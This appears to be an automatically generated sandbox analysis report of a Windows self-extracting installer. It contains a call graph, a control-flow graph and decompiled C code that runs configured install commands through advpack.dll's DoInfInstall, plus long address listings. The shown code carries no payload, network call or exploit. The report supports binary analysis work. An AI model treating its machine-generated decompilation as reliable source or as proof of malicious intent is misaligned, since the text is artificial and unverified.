3118->3117 3266 106a20 __getmainargs 3267 1019e0 3268 101a03 3267->3268 3269 101a24 GetDesktopWindow 3267->3269 3270 101a20 3268->3270 3272 101a16 EndDialog 3268->3272 3271 1043d0 11 API calls 3269->3271 3274 106ce0 4 API calls 3270->3274 3273 101a33 LoadStringA SetDlgItemTextA MessageBeep 3271->3273 3272->3270 3273->3270 3275 101a7e 3274->3275 3276 106bef _XcptFilter

                                                                                                                                                                                                                                                Callgraph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                • Opacity -> Relevance
                                                                                                                                                                                                                                                • Disassembly available
                                                                                                                                                                                                                                                callgraph 0 Function_00103210 22 Function_00104224 0->22 38 Function_0010597D 0->38 65 Function_0010658A 0->65 71 Function_001044B9 0->71 87 Function_001043D0 0->87 92 Function_001058C8 0->92 1 Function_00107010 2 Function_00105C17 3 Function_00106517 3->71 4 Function_0010411B 81 Function_00101EA7 4->81 5 Function_00102F1D 7 Function_0010621E 5->7 18 Function_00103A3F 5->18 23 Function_00103B26 5->23 44 Function_00105164 5->44 47 Function_00104169 5->47 48 Function_0010256D 5->48 63 Function_00106285 5->63 5->65 5->71 73 Function_001055A0 5->73 77 Function_00103BA2 5->77 105 Function_00106CE0 5->105 110 Function_001051E5 5->110 6 Function_0010171E 7->38 7->63 7->71 7->105 8 Function_0010681F 99 Function_001066F9 8->99 8->105 9 Function_00107000 10 Function_00104200 11 Function_00103100 11->87 12 Function_00104702 58 Function_00101680 12->58 69 Function_001016B3 12->69 13 Function_00106C03 33 Function_0010724D 13->33 14 Function_00107208 15 Function_0010490C 16 Function_00102630 16->71 16->105 17 Function_00104C37 18->3 18->63 67 Function_0010468F 18->67 18->71 19 Function_00106C3F 20 Function_00107120 21 Function_00106A20 22->58 22->71 23->3 54 Function_00106298 23->54 103 Function_00104FE0 23->103 24 Function_00106E2A 96 Function_00106CF0 24->96 25 Function_0010202A 25->6 25->65 25->71 25->105 26 Function_00104A50 27 Function_00103450 27->87 28 Function_00106952 29 Function_00106F54 29->14 29->33 30 Function_00107155 31 Function_00106F40 32 Function_00106648 34 Function_00107270 35 Function_00106C70 36 Function_00102773 36->58 61 Function_00101781 36->61 36->65 36->105 37 Function_0010487A 37->15 38->63 66 Function_0010268B 38->66 38->71 38->105 39 Function_0010667F 39->32 40 Function_00104B60 41 Function_00106A60 41->14 41->19 41->30 41->33 42 Function_00107060 41->42 100 Function_00102BFB 41->100 42->1 42->20 43 Function_00106760 44->54 44->67 44->71 45 Function_00105467 45->38 45->58 45->61 45->63 45->65 75 Function_001053A1 45->75 45->92 45->105 46 Function_00102267 46->6 46->65 46->105 47->67 47->71 104 Function_001024E0 48->104 49 Function_0010476D 49->3 84 Function_001066AE 49->84 50 Function_00102390 50->50 50->58 50->65 50->69 50->105 51 Function_00101F90 51->71 51->81 51->105 52 Function_00106793 53 Function_00106495 53->61 53->65 53->105 54->6 54->105 55 Function_00104E99 55->58 56 Function_00105C9E 56->2 56->24 56->39 56->58 56->65 56->71 93 Function_001066C8 56->93 56->105 106 Function_001031E0 56->106 57 Function_00104980 57->37 57->71 58->61 59 Function_00103680 60 Function_00106380 62 Function_00101A84 62->39 64 Function_00102A89 65->69 66->6 66->71 66->105 68 Function_001069B0 68->9 68->35 72 Function_00106FBE 68->72 118 Function_001071EF 68->118 69->61 70 Function_001052B6 70->50 70->61 70->105 109 Function_00101FE1 70->109 113 Function_001065E8 70->113 71->6 71->8 71->58 95 Function_001067C9 71->95 71->105 72->29 73->3 73->16 73->28 73->38 73->45 73->61 73->63 73->65 73->67 73->71 73->105 74 Function_00104CA0 75->6 75->58 75->65 75->105 76 Function_00106FA1 77->25 77->46 77->53 77->61 77->63 77->67 77->71 77->105 111 Function_00101AE8 77->111 117 Function_00103FEF 77->117 78 Function_001072A2 79 Function_001018A3 79->105 116 Function_001017EE 79->116 80 Function_00106FA5 80->33 81->48 82 Function_00102CAA 82->3 82->50 82->56 82->67 82->71 82->79 82->105 115 Function_001036EE 82->115 83 Function_00102AAC 83->58 94 Function_001017C8 83->94 83->105 83->113 85 Function_00104AD0 85->59 86 Function_00104CD0 86->12 86->17 86->40 86->49 86->55 86->57 86->105 107 Function_001047E0 86->107 87->105 88 Function_00104CC0 89 Function_00104BC0 90 Function_001030C0 91 Function_001063C0 91->61 91->65 91->105 92->58 92->63 92->65 92->71 93->32 95->52 97 Function_001034F0 97->59 97->71 97->87 98 Function_00106EF0 100->5 100->51 100->70 100->82 101 Function_00104EFD 101->40 101->57 101->105 102 Function_001070FE 103->67 103->71 103->101 104->65 104->105 105->96 107->58 107->71 108 Function_001019E0 108->87 108->105 110->63 110->67 110->71 111->6 111->58 111->61 111->62 111->65 111->69 111->71 111->83 111->93 111->105 112 Function_001028E8 112->36 112->64 114 Function_001070EB 115->8 115->64 115->71 115->95 115->105 115->112 116->105 117->4 117->63 117->71 117->105 119 Function_00106BEF

                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                Function 00103BA2 Relevance: 40.6, APIs: 11, Strings: 12, Instructions: 308libraryloaderCOMMONCrypto
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 36 103ba2-103bd9 37 103bdb-103bee call 10468f 36->37 38 103bfd-103bff 36->38 45 103d13-103d30 call 1044b9 37->45 46 103bf4-103bf7 37->46 40 103c03-103c28 memset 38->40 41 103d35-103d48 call 101781 40->41 42 103c2e-103c40 call 10468f 40->42 50 103d4d-103d52 41->50 42->45 53 103c46-103c49 42->53 58 103f4d 45->58 46->38 46->45 51 103d54-103d6c call 10468f 50->51 52 103d9e-103db6 call 101ae8 50->52 51->45 65 103d6e-103d75 51->65 52->58 69 103dbc-103dc2 52->69 53->45 56 103c4f-103c56 53->56 61 103c60-103c65 56->61 62 103c58-103c5e 56->62 59 103f4f-103f63 call 106ce0 58->59 67 103c75-103c7c 61->67 68 103c67-103c6d 61->68 66 103c6e-103c73 62->66 71 103fda-103fe1 65->71 72 103d7b-103d98 CompareStringA 65->72 73 103c87-103c89 66->73 67->73 76 103c7e-103c82 67->76 68->66 74 103dc4-103dce 69->74 75 103de6-103de8 69->75 77 103fe3 call 102267 71->77 78 103fe8-103fea 71->78 72->52 72->71 73->50 80 103c8f-103c98 73->80 74->75 79 103dd0-103dd7 74->79 81 103f0b-103f15 call 103fef 75->81 82 103dee-103df5 75->82 76->73 77->78 78->59 79->75 87 103dd9-103ddb 79->87 88 103cf1-103cf3 80->88 89 103c9a-103c9c 80->89 92 103f1a-103f1c 81->92 83 103fab-103fd2 call 1044b9 LocalFree 82->83 84 103dfb-103dfd 82->84 83->58 84->81 90 103e03-103e0a 84->90 87->82 93 103ddd-103de1 call 10202a 87->93 88->52 91 103cf9-103d11 call 10468f 88->91 95 103ca5-103ca7 89->95 96 103c9e-103ca3 89->96 90->81 98 103e10-103e19 call 106495 90->98 91->45 91->50 100 103f46-103f47 LocalFree 92->100 101 103f1e-103f2d LocalFree 92->101 93->75 95->58 97 103cad 95->97 104 103cb2-103cc5 call 10468f 96->104 97->104 113 103f92-103fa9 call 1044b9 98->113 114 103e1f-103e36 GetProcAddress 98->114 100->58 108 103f33-103f3b 101->108 109 103fd7-103fd9 101->109 104->45 112 103cc7-103ce8 CompareStringA 104->112 108->40 109->71 112->88 115 103cea-103ced 112->115 126 103f7c-103f90 LocalFree call 106285 113->126 116 103f64-103f76 call 1044b9 FreeLibrary 114->116 117 103e3c-103e80 114->117 115->88 116->126 120 103e82-103e87 117->120 121 103e8b-103e94 117->121 120->121 124 103e96-103e9b 121->124 125 103e9f-103ea2 121->125 124->125 128 103ea4-103ea9 125->128 129 103ead-103eb6 125->129 126->58 128->129 131 103ec1-103ec3 129->131 132 103eb8-103ebd 129->132 133 103ec5-103eca 131->133 134 103ece-103eec 131->134 132->131 133->134 137 103ef5-103efd 134->137 138 103eee-103ef3 134->138 139 103f40 FreeLibrary 137->139 140 103eff-103f09 FreeLibrary 137->140 138->137 139->100 140->101
                                                                                                                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                                                                                                                			E00103BA2() {
				signed int _v8;
				signed int _v12;
				char _v276;
				char _v280;
				short _v300;
				intOrPtr _v304;
				void _v348;
				char _v352;
				intOrPtr _v356;
				signed int _v360;
				short _v364;
				char* _v368;
				intOrPtr _v372;
				void* _v376;
				intOrPtr _v380;
				char _v384;
				signed int _v388;
				intOrPtr _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				void* _v408;
				void* _v424;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t69;
				signed int _t76;
				void* _t77;
				signed int _t79;
				short _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				int _t112;
				void* _t115;
				signed char _t118;
				void* _t125;
				signed int _t127;
				void* _t128;
				struct HINSTANCE__* _t129;
				void* _t130;
				short _t137;
				char* _t140;
				signed char _t144;
				signed char _t145;
				signed int _t149;
				void* _t150;
				void* _t151;
				signed int _t153;
				void* _t155;
				void* _t156;
				signed int _t157;
				signed int _t162;
				signed int _t164;
				void* _t165;

				_t164 = (_t162 & 0xfffffff8) - 0x194;
				_t69 =  *0x108004; // 0xb5a2e1bc
				_v8 = _t69 ^ _t164;
				_t153 = 0;
				 *0x109124 =  *0x109124 & 0;
				_t149 = 0;
				_v388 = 0;
				_v384 = 0;
				_t165 =  *0x108a28 - _t153; // 0x0
				if(_t165 != 0) {
					L3:
					_t127 = 0;
					_v392 = 0;
					while(1) {
						_v400 = _v400 & 0x00000000;
						memset( &_v348, 0, 0x44);
						_t164 = _t164 + 0xc;
						_v348 = 0x44;
						if( *0x108c42 != 0) {
							goto L26;
						}
						_t146 =  &_v396;
						_t115 = E0010468F("SHOWWINDOW",  &_v396, 4);
						if(_t115 == 0 || _t115 > 4) {
							L25:
							_t146 = 0x4b1;
							E001044B9(0, 0x4b1, 0, 0, 0x10, 0);
							 *0x109124 = 0x80070714;
							goto L62;
						} else {
							if(_v396 != 1) {
								__eflags = _v396 - 2;
								if(_v396 != 2) {
									_t137 = 3;
									__eflags = _v396 - _t137;
									if(_v396 == _t137) {
										_v304 = 1;
										_v300 = _t137;
									}
									goto L14;
								}
								_push(6);
								_v304 = 1;
								_pop(0);
								goto L11;
							} else {
								_v304 = 1;
								L11:
								_v300 = 0;
								L14:
								if(_t127 != 0) {
									L27:
									_t155 = 1;
									__eflags = _t127 - 1;
									if(_t127 != 1) {
										L31:
										_t132 =  &_v280;
										_t76 = E00101AE8( &_v280,  &_v408,  &_v404); // executed
										__eflags = _t76;
										if(_t76 == 0) {
											L62:
											_t77 = 0;
											L63:
											_pop(_t150);
											_pop(_t156);
											_pop(_t128);
											return E00106CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
										}
										_t157 = _v404;
										__eflags = _t149;
										if(_t149 != 0) {
											L37:
											__eflags = _t157;
											if(_t157 == 0) {
												L57:
												_t151 = _v408;
												_t146 =  &_v352;
												_t130 = _t151; // executed
												_t79 = E00103FEF(_t130,  &_v352); // executed
												__eflags = _t79;
												if(_t79 == 0) {
													L61:
													LocalFree(_t151);
													goto L62;
												}
												L58:
												LocalFree(_t151);
												_t127 = _t127 + 1;
												_v396 = _t127;
												__eflags = _t127 - 2;
												if(_t127 >= 2) {
													_t155 = 1;
													__eflags = 1;
													L69:
													__eflags =  *0x108580;
													if( *0x108580 != 0) {
														E00102267();
													}
													_t77 = _t155;
													goto L63;
												}
												_t153 = _v392;
												_t149 = _v388;
												continue;
											}
											L38:
											__eflags =  *0x108180;
											if( *0x108180 == 0) {
												_t146 = 0x4c7;
												E001044B9(0, 0x4c7, 0, 0, 0x10, 0);
												LocalFree(_v424);
												 *0x109124 = 0x8007042b;
												goto L62;
											}
											__eflags = _t157;
											if(_t157 == 0) {
												goto L57;
											}
											__eflags =  *0x109a34 & 0x00000004;
											if(__eflags == 0) {
												goto L57;
											}
											_t129 = E00106495(_t127, _t132, _t157, __eflags);
											__eflags = _t129;
											if(_t129 == 0) {
												_t146 = 0x4c8;
												E001044B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
												L65:
												LocalFree(_v408);
												 *0x109124 = E00106285();
												goto L62;
											}
											_t146 = GetProcAddress(_t129, "DoInfInstall");
											_v404 = _t146;
											__eflags = _t146;
											if(_t146 == 0) {
												_t146 = 0x4c9;
												__eflags = 0;
												E001044B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
												FreeLibrary(_t129);
												goto L65;
											}
											__eflags =  *0x108a30;
											_t151 = _v408;
											_v384 = 0;
											_v368 =  &_v280;
											_t96 =  *0x109a40; // 0x3
											_v364 = _t96;
											_t97 =  *0x108a38 & 0x0000ffff;
											_v380 = 0x109154;
											_v376 = _t151;
											_v372 = 0x1091e4;
											_v360 = _t97;
											if( *0x108a30 != 0) {
												_t97 = _t97 | 0x00010000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t144 =  *0x109a34; // 0x1
											__eflags = _t144 & 0x00000008;
											if((_t144 & 0x00000008) != 0) {
												_t97 = _t97 | 0x00020000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t144 & 0x00000010;
											if((_t144 & 0x00000010) != 0) {
												_t97 = _t97 | 0x00040000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t145 =  *0x108d48; // 0x0
											__eflags = _t145 & 0x00000040;
											if((_t145 & 0x00000040) != 0) {
												_t97 = _t97 | 0x00080000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t145;
											if(_t145 < 0) {
												_t104 = _t97 | 0x00100000;
												__eflags = _t104;
												_v360 = _t104;
											}
											_t98 =  *0x109a38; // 0x0
											_v356 = _t98;
											_t130 = _t146;
											 *0x10a288( &_v384);
											_t101 = _v404();
											__eflags = _t164 - _t164;
											if(_t164 != _t164) {
												_t130 = 4;
												asm("int 0x29");
											}
											 *0x109124 = _t101;
											_push(_t129);
											__eflags = _t101;
											if(_t101 < 0) {
												FreeLibrary();
												goto L61;
											} else {
												FreeLibrary();
												_t127 = _v400;
												goto L58;
											}
										}
										__eflags =  *0x109a40 - 1; // 0x3
										if(__eflags == 0) {
											goto L37;
										}
										__eflags =  *0x108a20;
										if( *0x108a20 == 0) {
											goto L37;
										}
										__eflags = _t157;
										if(_t157 != 0) {
											goto L38;
										}
										_v388 = 1;
										E0010202A(_t146); // executed
										goto L37;
									}
									_t146 =  &_v280;
									_t108 = E0010468F("POSTRUNPROGRAM",  &_v280, 0x104);
									__eflags = _t108;
									if(_t108 == 0) {
										goto L25;
									}
									__eflags =  *0x108c42;
									if( *0x108c42 != 0) {
										goto L69;
									}
									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
									__eflags = _t112 == 0;
									if(_t112 == 0) {
										goto L69;
									}
									goto L31;
								}
								_t118 =  *0x108a38; // 0x0
								if(_t118 == 0) {
									L23:
									if(_t153 != 0) {
										goto L31;
									}
									_t146 =  &_v276;
									if(E0010468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
										goto L27;
									}
									goto L25;
								}
								if((_t118 & 0x00000001) == 0) {
									__eflags = _t118 & 0x00000002;
									if((_t118 & 0x00000002) == 0) {
										goto L62;
									}
									_t140 = "USRQCMD";
									L20:
									_t146 =  &_v276;
									if(E0010468F(_t140,  &_v276, 0x104) == 0) {
										goto L25;
									}
									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
										_t153 = 1;
										_v388 = 1;
									}
									goto L23;
								}
								_t140 = "ADMQCMD";
								goto L20;
							}
						}
						L26:
						_push(_t130);
						_t146 = 0x104;
						E00101781( &_v276, 0x104, _t130, 0x108c42);
						goto L27;
					}
				}
				_t130 = "REBOOT";
				_t125 = E0010468F(_t130, 0x109a2c, 4);
				if(_t125 == 0 || _t125 > 4) {
					goto L25;
				} else {
					goto L3;
				}
			}





























































                                                                                                                                                                                                                                                0x00103baa
                                                                                                                                                                                                                                                0x00103bb0
                                                                                                                                                                                                                                                0x00103bb7
                                                                                                                                                                                                                                                0x00103bc0
                                                                                                                                                                                                                                                0x00103bc2
                                                                                                                                                                                                                                                0x00103bc9
                                                                                                                                                                                                                                                0x00103bcb
                                                                                                                                                                                                                                                0x00103bcf
                                                                                                                                                                                                                                                0x00103bd3
                                                                                                                                                                                                                                                0x00103bd9
                                                                                                                                                                                                                                                0x00103bfd
                                                                                                                                                                                                                                                0x00103bfd
                                                                                                                                                                                                                                                0x00103bff
                                                                                                                                                                                                                                                0x00103c03
                                                                                                                                                                                                                                                0x00103c03
                                                                                                                                                                                                                                                0x00103c11
                                                                                                                                                                                                                                                0x00103c16
                                                                                                                                                                                                                                                0x00103c19
                                                                                                                                                                                                                                                0x00103c28
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103c30
                                                                                                                                                                                                                                                0x00103c39
                                                                                                                                                                                                                                                0x00103c40
                                                                                                                                                                                                                                                0x00103d13
                                                                                                                                                                                                                                                0x00103d15
                                                                                                                                                                                                                                                0x00103d21
                                                                                                                                                                                                                                                0x00103d26
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103c4f
                                                                                                                                                                                                                                                0x00103c56
                                                                                                                                                                                                                                                0x00103c60
                                                                                                                                                                                                                                                0x00103c65
                                                                                                                                                                                                                                                0x00103c77
                                                                                                                                                                                                                                                0x00103c78
                                                                                                                                                                                                                                                0x00103c7c
                                                                                                                                                                                                                                                0x00103c7e
                                                                                                                                                                                                                                                0x00103c82
                                                                                                                                                                                                                                                0x00103c82
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103c7c
                                                                                                                                                                                                                                                0x00103c67
                                                                                                                                                                                                                                                0x00103c69
                                                                                                                                                                                                                                                0x00103c6d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103c58
                                                                                                                                                                                                                                                0x00103c58
                                                                                                                                                                                                                                                0x00103c6e
                                                                                                                                                                                                                                                0x00103c6e
                                                                                                                                                                                                                                                0x00103c87
                                                                                                                                                                                                                                                0x00103c89
                                                                                                                                                                                                                                                0x00103d4d
                                                                                                                                                                                                                                                0x00103d4f
                                                                                                                                                                                                                                                0x00103d50
                                                                                                                                                                                                                                                0x00103d52
                                                                                                                                                                                                                                                0x00103d9e
                                                                                                                                                                                                                                                0x00103da8
                                                                                                                                                                                                                                                0x00103daf
                                                                                                                                                                                                                                                0x00103db4
                                                                                                                                                                                                                                                0x00103db6
                                                                                                                                                                                                                                                0x00103f4d
                                                                                                                                                                                                                                                0x00103f4d
                                                                                                                                                                                                                                                0x00103f4f
                                                                                                                                                                                                                                                0x00103f56
                                                                                                                                                                                                                                                0x00103f57
                                                                                                                                                                                                                                                0x00103f58
                                                                                                                                                                                                                                                0x00103f63
                                                                                                                                                                                                                                                0x00103f63
                                                                                                                                                                                                                                                0x00103dbc
                                                                                                                                                                                                                                                0x00103dc0
                                                                                                                                                                                                                                                0x00103dc2
                                                                                                                                                                                                                                                0x00103de6
                                                                                                                                                                                                                                                0x00103de6
                                                                                                                                                                                                                                                0x00103de8
                                                                                                                                                                                                                                                0x00103f0b
                                                                                                                                                                                                                                                0x00103f0b
                                                                                                                                                                                                                                                0x00103f0f
                                                                                                                                                                                                                                                0x00103f13
                                                                                                                                                                                                                                                0x00103f15
                                                                                                                                                                                                                                                0x00103f1a
                                                                                                                                                                                                                                                0x00103f1c
                                                                                                                                                                                                                                                0x00103f46
                                                                                                                                                                                                                                                0x00103f47
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103f47
                                                                                                                                                                                                                                                0x00103f1e
                                                                                                                                                                                                                                                0x00103f1f
                                                                                                                                                                                                                                                0x00103f25
                                                                                                                                                                                                                                                0x00103f26
                                                                                                                                                                                                                                                0x00103f2a
                                                                                                                                                                                                                                                0x00103f2d
                                                                                                                                                                                                                                                0x00103fd9
                                                                                                                                                                                                                                                0x00103fd9
                                                                                                                                                                                                                                                0x00103fda
                                                                                                                                                                                                                                                0x00103fda
                                                                                                                                                                                                                                                0x00103fe1
                                                                                                                                                                                                                                                0x00103fe3
                                                                                                                                                                                                                                                0x00103fe3
                                                                                                                                                                                                                                                0x00103fe8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103fe8
                                                                                                                                                                                                                                                0x00103f33
                                                                                                                                                                                                                                                0x00103f37
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103f37
                                                                                                                                                                                                                                                0x00103dee
                                                                                                                                                                                                                                                0x00103dee
                                                                                                                                                                                                                                                0x00103df5
                                                                                                                                                                                                                                                0x00103fad
                                                                                                                                                                                                                                                0x00103fb9
                                                                                                                                                                                                                                                0x00103fc2
                                                                                                                                                                                                                                                0x00103fc8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103fc8
                                                                                                                                                                                                                                                0x00103dfb
                                                                                                                                                                                                                                                0x00103dfd
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103e03
                                                                                                                                                                                                                                                0x00103e0a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103e15
                                                                                                                                                                                                                                                0x00103e17
                                                                                                                                                                                                                                                0x00103e19
                                                                                                                                                                                                                                                0x00103f94
                                                                                                                                                                                                                                                0x00103fa4
                                                                                                                                                                                                                                                0x00103f7c
                                                                                                                                                                                                                                                0x00103f80
                                                                                                                                                                                                                                                0x00103f8b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103f8b
                                                                                                                                                                                                                                                0x00103e2c
                                                                                                                                                                                                                                                0x00103e30
                                                                                                                                                                                                                                                0x00103e34
                                                                                                                                                                                                                                                0x00103e36
                                                                                                                                                                                                                                                0x00103f69
                                                                                                                                                                                                                                                0x00103f6e
                                                                                                                                                                                                                                                0x00103f70
                                                                                                                                                                                                                                                0x00103f76
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103f76
                                                                                                                                                                                                                                                0x00103e3c
                                                                                                                                                                                                                                                0x00103e43
                                                                                                                                                                                                                                                0x00103e47
                                                                                                                                                                                                                                                0x00103e52
                                                                                                                                                                                                                                                0x00103e56
                                                                                                                                                                                                                                                0x00103e5c
                                                                                                                                                                                                                                                0x00103e61
                                                                                                                                                                                                                                                0x00103e68
                                                                                                                                                                                                                                                0x00103e70
                                                                                                                                                                                                                                                0x00103e74
                                                                                                                                                                                                                                                0x00103e7c
                                                                                                                                                                                                                                                0x00103e80
                                                                                                                                                                                                                                                0x00103e82
                                                                                                                                                                                                                                                0x00103e82
                                                                                                                                                                                                                                                0x00103e87
                                                                                                                                                                                                                                                0x00103e87
                                                                                                                                                                                                                                                0x00103e8b
                                                                                                                                                                                                                                                0x00103e91
                                                                                                                                                                                                                                                0x00103e94
                                                                                                                                                                                                                                                0x00103e96
                                                                                                                                                                                                                                                0x00103e96
                                                                                                                                                                                                                                                0x00103e9b
                                                                                                                                                                                                                                                0x00103e9b
                                                                                                                                                                                                                                                0x00103e9f
                                                                                                                                                                                                                                                0x00103ea2
                                                                                                                                                                                                                                                0x00103ea4
                                                                                                                                                                                                                                                0x00103ea4
                                                                                                                                                                                                                                                0x00103ea9
                                                                                                                                                                                                                                                0x00103ea9
                                                                                                                                                                                                                                                0x00103ead
                                                                                                                                                                                                                                                0x00103eb3
                                                                                                                                                                                                                                                0x00103eb6
                                                                                                                                                                                                                                                0x00103eb8
                                                                                                                                                                                                                                                0x00103eb8
                                                                                                                                                                                                                                                0x00103ebd
                                                                                                                                                                                                                                                0x00103ebd
                                                                                                                                                                                                                                                0x00103ec1
                                                                                                                                                                                                                                                0x00103ec3
                                                                                                                                                                                                                                                0x00103ec5
                                                                                                                                                                                                                                                0x00103ec5
                                                                                                                                                                                                                                                0x00103eca
                                                                                                                                                                                                                                                0x00103eca
                                                                                                                                                                                                                                                0x00103ece
                                                                                                                                                                                                                                                0x00103ed5
                                                                                                                                                                                                                                                0x00103ed9
                                                                                                                                                                                                                                                0x00103ee0
                                                                                                                                                                                                                                                0x00103ee6
                                                                                                                                                                                                                                                0x00103eea
                                                                                                                                                                                                                                                0x00103eec
                                                                                                                                                                                                                                                0x00103eee
                                                                                                                                                                                                                                                0x00103ef3
                                                                                                                                                                                                                                                0x00103ef3
                                                                                                                                                                                                                                                0x00103ef5
                                                                                                                                                                                                                                                0x00103efa
                                                                                                                                                                                                                                                0x00103efb
                                                                                                                                                                                                                                                0x00103efd
                                                                                                                                                                                                                                                0x00103f40
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103eff
                                                                                                                                                                                                                                                0x00103eff
                                                                                                                                                                                                                                                0x00103f05
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103f05
                                                                                                                                                                                                                                                0x00103efd
                                                                                                                                                                                                                                                0x00103dc7
                                                                                                                                                                                                                                                0x00103dce
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103dd0
                                                                                                                                                                                                                                                0x00103dd7
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103dd9
                                                                                                                                                                                                                                                0x00103ddb
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103ddd
                                                                                                                                                                                                                                                0x00103de1
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103de1
                                                                                                                                                                                                                                                0x00103d59
                                                                                                                                                                                                                                                0x00103d65
                                                                                                                                                                                                                                                0x00103d6a
                                                                                                                                                                                                                                                0x00103d6c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103d6e
                                                                                                                                                                                                                                                0x00103d75
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103d8f
                                                                                                                                                                                                                                                0x00103d96
                                                                                                                                                                                                                                                0x00103d98
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103d98
                                                                                                                                                                                                                                                0x00103c8f
                                                                                                                                                                                                                                                0x00103c98
                                                                                                                                                                                                                                                0x00103cf1
                                                                                                                                                                                                                                                0x00103cf3
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103cfe
                                                                                                                                                                                                                                                0x00103d11
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103d11
                                                                                                                                                                                                                                                0x00103c9c
                                                                                                                                                                                                                                                0x00103ca5
                                                                                                                                                                                                                                                0x00103ca7
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103cad
                                                                                                                                                                                                                                                0x00103cb2
                                                                                                                                                                                                                                                0x00103cb7
                                                                                                                                                                                                                                                0x00103cc5
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103ce8
                                                                                                                                                                                                                                                0x00103cec
                                                                                                                                                                                                                                                0x00103ced
                                                                                                                                                                                                                                                0x00103ced
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103ce8
                                                                                                                                                                                                                                                0x00103c9e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103c9e
                                                                                                                                                                                                                                                0x00103c56
                                                                                                                                                                                                                                                0x00103d35
                                                                                                                                                                                                                                                0x00103d35
                                                                                                                                                                                                                                                0x00103d3c
                                                                                                                                                                                                                                                0x00103d48
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103d48
                                                                                                                                                                                                                                                0x00103c03
                                                                                                                                                                                                                                                0x00103be2
                                                                                                                                                                                                                                                0x00103be7
                                                                                                                                                                                                                                                0x00103bee
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00103C11
                                                                                                                                                                                                                                                • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00103CDC
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001046A0
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: SizeofResource.KERNEL32(00000000,00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046A9
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001046C3
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: LoadResource.KERNEL32(00000000,00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046CC
